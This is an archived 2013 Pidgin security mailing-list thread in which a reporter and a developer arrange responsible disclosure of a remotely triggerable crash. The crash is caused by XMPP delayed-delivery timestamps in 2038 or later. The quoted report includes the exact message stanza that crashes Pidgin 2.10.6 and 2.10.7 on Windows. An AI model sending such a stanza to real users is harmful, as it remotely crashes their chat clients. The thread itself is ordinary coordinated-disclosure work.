Remotely triggerable crash

Pho phofin at gmail.com
Thu Sep 26 13:01:34 EDT 2013 

You are welcome, and don't worry, I'll keep it secret.
Also, it's ok to use my full name and email for the credit:
Jaime Breva Ribes <jbrevaribes at gmail.com>


On 26 September 2013 18:43, Ethan Blanton <elb at pidgin.im> wrote:

> Pho spake unto us the following wisdom:
> > I've been playing with the XEP-0203 (Delayed Delivery), and i've found
> that
> > the stanza:
> >
> > <message type="chat" to="pho at jabberes.org/pichon" id="ab30a">
> > <body>die pidgin die</body>
> > <delay xmlns='urn:xmpp:delay' stamp='2038-09-10T23:05:37Z'/>
> > </message>
> >
> > Remotely crashes (at least) pidgin 2.10.6 and 2.10.7 for Windows.
> > It just happens when the year is >=2038, and works on MUC too
>
> Thank you for the report!  This is probably related to wraparound of a
> 32-bit time_t (as that happens sometime in 2038).  We will look into
> it.
>
> Because this is a remotely triggerable crash, we request that you keep
> it secret until the Pidgin release in which it is fixed.  We have a
> number of outstanding less serious bugs to fix, so there will probably
> be a release relatively soon.  We will request a CVE for this
> vulnerability, set a release date for the corrected source, and
> coordinate with the various vendors and distributions that ship Pidgin
> and libpurple to release more or less simultaneously.
>
> In order to make sure that you get the appropriate recognition for
> discovery of this vulnerability, please let us know how you would like
> to be credited.  The usual credit is full name and email address, but
> this is entirely up to you.
>
> We will make sure that you are notified of the embargo date and CVE
> information for this vulnerability in advance of the release that
> corrects it.
>
> Ethan
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.10 (GNU/Linux)
>
> iQEVAwUBUkRkS/8fixZ3H8crAQiHbQf/flHqAOD2H0odUEmG8LrK4I9H4oRVYZtB
> d9yv/zg/qokG8Ib5YoGqG66qeZGDLJ89HFgNtlG0a2amO9QBLKOCKbfD0ks6SJjh
> U5IDEt/qADiCHVDdHJ8mJQd/U5or+6LPPg10exsEZlug52m8vpCyfZkNq3MmBmI4
> 5tMfxroIMtPSRlomrJBgsXKHVo9Upjc8qnOQ96G9QPu9t11uWPJ6tzFx68aIc11A
> lp8nGU0FDszqf1TKtUykCFGBwuS4BmFQA0a8O2rt4SzcXCEy1phJ0YMloo1cAymC
> /+mPMuJ4OekoIaxCF9VJKUE8oKDOB2YkoJWlZgjlG+98rr9EFxUC2A==
> =xE5e
> -----END PGP SIGNATURE-----
>
>


-- 
Saludos! :3
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://pidgin.im/cgi-bin/mailman/private/security/attachments/20130926/58ecfbaf/attachment-0001.html>

More information about the security mailing list